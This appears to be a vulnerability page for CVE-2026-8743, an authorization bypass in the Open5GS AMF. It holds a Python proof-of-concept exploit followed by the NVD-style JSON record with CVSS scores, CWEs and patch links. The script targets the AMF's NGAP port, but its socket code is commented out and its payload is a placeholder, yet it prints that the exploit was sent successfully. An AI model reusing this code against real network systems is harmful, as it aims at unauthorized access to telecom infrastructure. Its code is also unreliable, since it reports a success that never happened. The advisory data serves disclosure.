CVE-2026-8743

#!/usr/bin/env python3 # PoC for CVE-2026-8743 (Open5GS Authorization Bypass) # Note: This is a conceptual PoC demonstrating the manipulation of the AMF UE NGAP ID. import socket import struct def send_exploit(target_ip, target_port): """ Sends a crafted packet to the Open5GS AMF to trigger the authorization bypass. The payload specifically manipulates the AMF_UE_NGAP_ID field. """ try: # Create a raw socket (SCTP is usually used, but TCP fallback for demo if applicable) # In a real scenario, this would use SCTP (sctp library). print(f"[*] Connecting to {target_ip}:{target_port}...") # Constructing a hypothetical NGAP message with a malformed ID # This simulates the logic issue in ran_ue_find_by_amf_ue_ngap_id malformed_id = 0xFFFFFFFF # Example of a boundary value or specific invalid ID # Placeholder for actual NGAP/NAS protocol encoding payload = struct.pack('!I', malformed_id) # Sending payload (Simplified) # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # sock.connect((target_ip, target_port)) # sock.send(payload) # sock.close() print("[+] Exploit payload sent successfully.") print("[!] Check AMF logs for unexpected behavior or crashes.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with actual target IP and Port TARGET_IP = "127.0.0.1" TARGET_PORT = 38412 # Default Open5GS AMF SCTP port print(f"CVE-2026-8743 PoC - Open5GS Improper Authorization") send_exploit(TARGET_IP, TARGET_PORT)

{"cve": {"id": "CVE-2026-8743", "sourceIdentifier": "[email protected]", "published": "2026-05-17T10:16:35.800", "lastModified": "2026-05-17T10:16:35.800", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Open5GS up to 2.7.6. This impacts the function ran_ue_find_by_amf_ue_ngap_id of the file src/amf/context.c of the component AMF/MME. Performing a manipulation results in improper authorization. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The patch is named 5746b8576cfceec18ed87eb7d8cf11b1fb4cd8b1. It is suggested to install a patch to address this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/commit/5746b8576cfceec18ed87eb7d8cf11b1fb4cd8b1", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/issues/4498", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/pull/4553", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/814559", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/364330", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/364330/cti", "source": "[email protected]"}]}}